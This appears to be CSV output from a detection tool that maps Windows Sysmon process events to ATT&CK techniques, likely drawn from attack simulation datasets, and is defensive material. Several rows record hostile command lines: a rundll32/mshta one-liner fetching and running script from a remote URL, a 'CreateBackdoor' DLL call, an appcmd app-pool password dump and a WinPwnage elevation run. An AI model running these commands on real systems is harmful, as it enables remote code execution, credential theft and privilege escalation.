<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T15:16:31.779226Z"">
</TimeCreated>
<EventRecordID>5536</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 15:16:31.676</Data>
<Data Name=""ProcessGuid"">747F3D96-A54F-5D45-0000-0010D83FA101</Data>
<Data Name=""ProcessId"">1716</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A54F-5D45-0000-0010C429A101</Data>
<Data Name=""ParentProcessId"">6080</Data>
<Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ParentProcessId"">1532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine (&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-01-26T13:21:14.023510Z"">
</TimeCreated>
<EventRecordID>2429138</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5272"" ThreadID=""6060"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-01-26 13:21:14.021</Data>
<Data Name=""ProcessGuid"">00247C92-174A-6010-0000-0010C0B2D92E</Data>
<Data Name=""ProcessId"">18548</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe start-process notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
<Data Name=""LogonId"">0x26f746a2</Data>
<Data Name=""TerminalSessionId"">5</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A</Data>
<Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
<Data Name=""ParentProcessId"">23168</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
</TimeCreated>
<EventRecordID>243527</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
<Data Name=""ProcessId"">8076</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-13T20:11:42.279861Z"">
</TimeCreated>
<EventRecordID>2196443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5340"" ThreadID=""7092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-13 20:11:42.277</Data>
<Data Name=""ProcessGuid"">00247C92-09FE-5F86-0000-0010AD861401</Data>
<Data Name=""ProcessId"">7648</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Windows\System32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-DE70-5F85-0000-002059F80600</Data>
<Data Name=""LogonId"">0x6f859</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-09FE-5F86-0000-001051841401</Data>
<Data Name=""ParentProcessId"">1716</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wuauclt.exe</Data>
<Data Name=""ParentCommandLine"">wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer </Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ParentProcessId"">1532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.522500Z"">
</TimeCreated>
<EventRecordID>5928</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.472</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010CC99FF00</Data>
<Data Name=""ProcessId"">344</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-01-26T13:21:14.023510Z"">
</TimeCreated>
<EventRecordID>2429138</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5272"" ThreadID=""6060"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-01-26 13:21:14.021</Data>
<Data Name=""ProcessGuid"">00247C92-174A-6010-0000-0010C0B2D92E</Data>
<Data Name=""ProcessId"">18548</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe start-process notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
<Data Name=""LogonId"">0x26f746a2</Data>
<Data Name=""TerminalSessionId"">5</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A</Data>
<Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
<Data Name=""ParentProcessId"">23168</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /delete /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:40.342246Z"">
</TimeCreated>
<EventRecordID>16249</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:40.164</Data>
<Data Name=""ProcessGuid"">365ABB72-69A8-5CD7-0000-0010C0982200</Data>
<Data Name=""ProcessId"">3792</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /delete /tn elevator</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
<Data Name=""LogonId"">0x1384a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
<Data Name=""ParentProcessId"">2740</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:45.405337Z"">
</TimeCreated>
<EventRecordID>6175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:45.383</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
<Data Name=""ProcessId"">3876</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
